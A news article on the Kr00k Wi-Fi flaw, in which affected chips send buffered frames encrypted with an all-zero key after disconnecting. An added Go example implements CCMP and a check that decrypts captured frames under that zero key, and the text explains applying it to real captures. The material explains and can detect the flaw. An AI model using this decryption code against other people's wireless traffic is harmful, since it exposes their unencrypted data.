A newly disclosed vulnerability could allow attackers to obtain sensitive information from more than one billion Wi-Fi-capable devices.
Kr00k (CVE-2019-15126) causes affected devices to encrypt part of a user's wireless traffic with an all-zero encryption key, allowing an attacker to decrypt some of the wireless packets those devices transmit.
The vulnerability is related to the infamous KRACK (Key Reinstallation Attacks) disclosed in 2017, although the researchers point out a few key differences.
Kr00k affects devices that use Wi-Fi chips produced by Broadcom and Cypress, including smartphones, tablets, laptops, IoT devices, and routers.
ESET reported its findings to Broadcom and Cypress last summer, and both vendors have since released patches, which many devices have already received. Before those patches were deployed, ESET estimated that more than one billion devices were vulnerable to a Kr00k attack.
The vulnerability is triggered by a disassociation: the moment a device is disconnected from a Wi-Fi network, whether because of signal interference, a switch to another access point, or Wi-Fi being turned off on the device.
Once disassociated, the session key (the temporal key, TK) held in the device's Wi-Fi chip, the wireless network interface controller (WNIC), is cleared from memory and set to all zeros. Any data frames still sitting in the chip's transmit buffer are nevertheless sent, encrypted with that all-zero key.
An attacker within radio range of the targeted device can capture those frames and, because the key is known, decrypt them, recovering several kilobytes of potentially sensitive data.
ESET notes that an attacker can force disassociations and reassociations repeatedly to harvest more data frames and raise the odds of capturing something sensitive. The company also points out that traffic protected at a higher layer, such as TLS, cannot be recovered this way: Kr00k strips only the Wi-Fi encryption layer, so what is exposed is whatever the device sent without encryption of its own.
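The mechanism above, written out as an added example that is not part of this article or of ESET's research: a compact Go implementation of 802.11 CCMP (the AES-CCM mode WPA2 uses for data frames, with the nonce and additional authenticated data derived from the MAC header as the standard specifies) and the check ESET's description implies, namely trying to decrypt a captured protected frame with an all-zero temporal key and accepting the result only if the frame's MIC verifies. Everything concrete here is constructed for the example: `sampleHeader` builds a plain (non-QoS, three-address) station-to-AP data frame with made-up addresses and packet numbers, the temporal key in `main` is a placeholder, and the payload is a short string standing in for an IP packet. A frame encrypted under a real TK fails the zero-key attempt; a frame that a vulnerable chip flushed from its transmit buffer after zeroing the key decrypts and verifies. QoS frames, which add the TID to the nonce and the QoS Control field to the AAD, are not handled.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/subtle"
	"fmt"
)

// Sizes for a non-QoS three-address data frame: MAC header, CCMP header (PN0 PN1 Rsvd KeyID PN2 PN3 PN4 PN5), MIC.
const hdrLen, ccmpHdrLen, micLen = 24, 8, 8

// cbcMAC is the CCM (RFC 3610) authentication pass with CCMP parameters: 13-byte nonce, 8-byte MIC, 2-byte length.
func cbcMAC(block cipher.Block, nonce, aad, msg []byte) []byte {
	pad := func(p []byte) []byte { return append(p, make([]byte, (16-len(p)%16)%16)...) }
	b0 := append(append([]byte{0x59}, nonce...), byte(len(msg)>>8), byte(len(msg))) // flags 0x59: Adata, M'=(8-2)/2, L'=2-1
	data := append(b0, pad(append([]byte{byte(len(aad) >> 8), byte(len(aad))}, aad...))...) // 2-byte AAD length || AAD
	data = append(data, pad(append([]byte{}, msg...))...)
	x := make([]byte, 16)
	for i := 0; i < len(data); i += 16 {
		for j := range x {
			x[j] ^= data[i+j]
		}
		block.Encrypt(x, x)
	}
	return x[:micLen]
}

// ccm encrypts plaintext to ciphertext||MIC, or decrypts ciphertext||MIC to plaintext (ok is false if the MIC fails).
func ccm(key, nonce, aad, in []byte, encrypt bool) ([]byte, bool) {
	block, err := aes.NewCipher(key)
	if err != nil || (!encrypt && len(in) < micLen) {
		return nil, false
	}
	stream := cipher.NewCTR(block, append(append([]byte{0x01}, nonce...), 0, 0)) // flags L'=1 || nonce || 2-byte counter
	s0 := make([]byte, 16)
	stream.XORKeyStream(s0, s0) // counter 0 keystream masks the MIC; the payload uses counter 1 onward
	tag := func(plain []byte) []byte {
		t := cbcMAC(block, nonce, aad, plain)
		for i := range t {
			t[i] ^= s0[i]
		}
		return t
	}
	if encrypt {
		out := make([]byte, len(in))
		stream.XORKeyStream(out, in)
		return append(out, tag(in)...), true
	}
	body, mic := in[:len(in)-micLen], in[len(in)-micLen:]
	out := make([]byte, len(body))
	stream.XORKeyStream(out, body)
	if subtle.ConstantTimeCompare(tag(out), mic) != 1 {
		return nil, false
	}
	return out, true
}

// ccmpParams derives the CCM nonce and AAD from a protected non-QoS data frame's MAC and CCMP headers (802.11 CCMP).
func ccmpParams(frame []byte) (nonce, aad []byte) {
	h, c := frame[:hdrLen], frame[hdrLen:hdrLen+ccmpHdrLen]
	nonce = append(append([]byte{0}, h[10:16]...), c[7], c[6], c[5], c[4], c[1], c[0]) // priority 0 || A2 || PN5..PN0
	aad = append([]byte{h[0] & 0x8f, h[1]&^0x38 | 0x40}, h[4:22]...)                 // FC masked (subtype b4-b6, Retry, PwrMgt, MoreData cleared; Protected set) || A1 A2 A3
	return nonce, append(aad, h[22]&0x0f, 0)                                          // SeqCtl with the sequence number masked, fragment number kept
}

// sampleHeader is a constructed station-to-AP data frame header plus CCMP header for packet number pn (addresses made up).
func sampleHeader(pn uint64) []byte {
	h := append([]byte{0x08, 0x41, 0, 0}, "\x00\x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa\xbb\xcc\xdd\xee\xff\x00\x11"...) // FC: Data, ToDS+Protected; Duration; A1 A2 A3
	h = append(h, 0x00, 0x01)                                                                                         // SeqCtl: sequence number 16, fragment 0
	return append(h, byte(pn), byte(pn>>8), 0, 0x20, byte(pn>>16), byte(pn>>24), byte(pn>>32), byte(pn>>40))          // CCMP header: PN0 PN1 Rsvd ExtIV|KeyID0 PN2..PN5
}

// encryptFrame and decryptFrame apply CCMP to hdr||payload, or to a captured frame, with temporal key tk.
func encryptFrame(tk, hdr, payload []byte) []byte {
	nonce, aad := ccmpParams(hdr)
	ct, _ := ccm(tk, nonce, aad, payload, true)
	return append(append([]byte{}, hdr...), ct...)
}

func decryptFrame(tk, frame []byte) ([]byte, bool) {
	if len(frame) < hdrLen+ccmpHdrLen+micLen {
		return nil, false
	}
	nonce, aad := ccmpParams(frame)
	return ccm(tk, nonce, aad, frame[hdrLen+ccmpHdrLen:], false)
}

// kr00kLeak is the Kr00k check: a captured frame whose MIC verifies under an all-zero TK was sent after the chip zeroed its key.
func kr00kLeak(frame []byte) ([]byte, bool) {
	return decryptFrame(make([]byte, 16), frame)
}

func main() {
	tk := []byte("0123456789abcdef") // constructed TK; a real one comes out of the 4-way handshake
	_, okReal := kr00kLeak(encryptFrame(tk, sampleHeader(1), []byte("GET /login HTTP/1.1")))
	p, okZero := kr00kLeak(encryptFrame(make([]byte, 16), sampleHeader(2), []byte("GET /login HTTP/1.1")))
	fmt.Printf("real TK leaks: %v; all-zero TK leaks: %v, recovered %q\n", okReal, okZero, p)
}
```

Against a real capture one would feed each protected data frame (FCS stripped) to `kr00kLeak`; the frames that verify under the zero key are the ones the chip leaked. The MIC is the reliable signal: decrypting with the wrong key yields noise, and merely looking for a plausible LLC/SNAP header in the output would produce false positives. The recovered bytes are exactly what the device sent above the Wi-Fi layer, which is why a TLS record stays opaque while a plain HTTP request, as in the example, does not.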
>> For more information on this vulnerability, read ESET's complete research paper.